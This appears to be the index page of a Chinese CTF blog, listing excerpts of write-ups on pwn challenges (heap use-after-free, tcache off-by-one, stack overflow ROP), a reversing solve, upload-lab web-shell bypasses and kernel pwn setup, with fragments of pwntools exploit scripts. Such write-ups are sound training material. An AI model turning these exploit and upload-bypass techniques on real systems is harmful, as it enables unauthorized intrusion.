发表于 | 分类于 | | 热度:
字数统计: 1.5k | 阅读时长 ≈ 8
比赛一共3题pwn,两题入门,最后一题中等挺有意思,涉及到seccomp以及shellcode爆破flag 题目地址: https://github.com/hacker-mao/ctf_repo/tree/master/2019%E6%95%B0%E5%AD%97%E7%BB%8F%E6%B5%8E%E4%BA%91%E5%AE%89%E5%85%A8%E5%85%B1%E6%B5%8B%E5%A4%A7%E8%B5%9B%E5%88%9D%E8%B5%9B fkroman 与De1CTF 2019 的Weapon基本一样,delete存在uaf,edit函数存在堆溢出,题目没有输出 ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 4.1k | 阅读时长 ≈ 24
Pwnpwn1 Run函数有个条件竞争,可以泄漏libc,后面libc换了2.27,所以条件竞争配合uaf写fd指针到__malloc_hook然后改为one_gadget即可 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798from pwn import *conte ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 2.5k | 阅读时长 ≈ 12
题目地址: https://github.com/hacker-mao/ctf_repo/tree/master/%E6%8A%A4%E7%BD%91%E6%9D%AF2019/pwn 一共4道题,比赛时间太短,赛后花了一天时间弄出3道,继续学习 mergeheap libc2.27,典型的tcache题目,程序的漏洞在于off by one 当分配的堆块占用了下一chunk的pre_size位时,strcpy的时候会将下一chunk的size也复制,再配合strcat会溢出一个字节 首先先填满tcache,为了下一次free时候将会放入unsorted bin中,然后构造4个不和填 ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 1k | 阅读时长 ≈ 6
太菜了,只做出了3道pwn babyrop 利用’\x00’绕过strlen的检查,然后栈溢出rop 12345678910111213141516171819202122232425262728293031323334353637383940from pwn import *context.log_level = 'debug'#p = process('./babyrop')p = remote('47.112.137.238',13337)elf = ELF('./babyrop')libc = ELF(& ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 1.7k | 阅读时长 ≈ 8
REre-150 upx脱壳后,程序逻辑十分清晰,但出题人少了一位校验,所以造成题目多解,官网爆破 直接写脚本 1234567891011121314151617181920212223242526272829303132333435363738394041a = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]a[0] = 166163712 / 1629056a[1] = 731332800 / 6771600a[2] = 357245568 / 3682944a[3] = 1074393000 / ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 1.8k | 阅读时长 ≈ 9
最简单的pwn nc然后cat flag pwn3 64位栈溢出,程序有后门,栈溢出然后return到后门即可 12345678910from pwn import *p = process('./pwn3')p.recvuntil(' something?\n')payload = 'a'*0x30 + 'bbbbbbbb' + p64(0x400751)p.sendline(payload)p.interactive() pwn7 32位教科书栈溢出,先利用write函数泄漏libc地址,然后得到syst ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 1.5k | 阅读时长 ≈ 5
一个帮你总结所有类型的上传漏洞的靶场 Pass-01 在js中发现校验文件后缀的函数,我们添加php类型后在控制台更改然后上传shell 上传shell之后在返回的数据中发现了shell的路径,然后用蚁剑连接即可 Pass-02 这关是服务器验证,首先试了php后缀,当然是不行的,然后继续试了1.php.jpg是可以上传的,1.php.asd是不可以上传的,所以可以知道是白名单绕过,然后没思路看了提示和源码发现是检验了数据包的content-type,所以上传php的时候抓包修改content-type为image/jpeg来绕过上传即可 Pass-03 上传php的时候 ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 1.4k | 阅读时长 ≈ 7
前面做了一道kernel-uaf的题,接着复现一下kernel-rop的题目 环境分析 首先按照kernel pwn的套路,先解压core.cpio文件,查看init文件 123456789101112131415161718192021222324#!/bin/shmount -t proc proc /procmount -t sysfs sysfs /sysmount -t devtmpfs none /dev/sbin/mdev -smkdir -p /dev/ptsmount -vt devpts -o gid=4,mode=620 none /dev/ptschmod 666 / ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 1.3k | 阅读时长 ≈ 6
这是一道kernel uaf的题目,记录一下一般拿到kernel pwn题应该如何操作,首先拿到题目解压后有3个文件 boot.sh: 一个用于启动 kernel 的 shell 的脚本,多用 qemu,保护措施与 qemu 不同的启动参数有关 bzImage: kernel binary rootfs.cpio: 文件系统映像 所以先新建一个文件夹,然后解压文件系统映像 1234mkdir fscd fscp ../rootfs.cpio ./cpio -idmv < rootfs.cpio 然后查看init文件的内容,可以知道babydriver.ko就是我们需要分析 ...
阅读全文 »

发表于 | 分类于 | | 热度:
字数统计: 1.7k | 阅读时长 ≈ 8
照着师傅们的教程弄的,顺便记录一些自己遇到的问题 编译内核 or 下载内核自己编译内核 安装所需要的依赖 12sudo apt-get updatesudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc 下载kernel源码,这里我下载的是4.4.72版本 解压源码,然后在源码目录 1make menuconfig 123456进入kernel hacking勾选以下项目Kernel debuggingCompile-time checks and compiler ...
阅读全文 »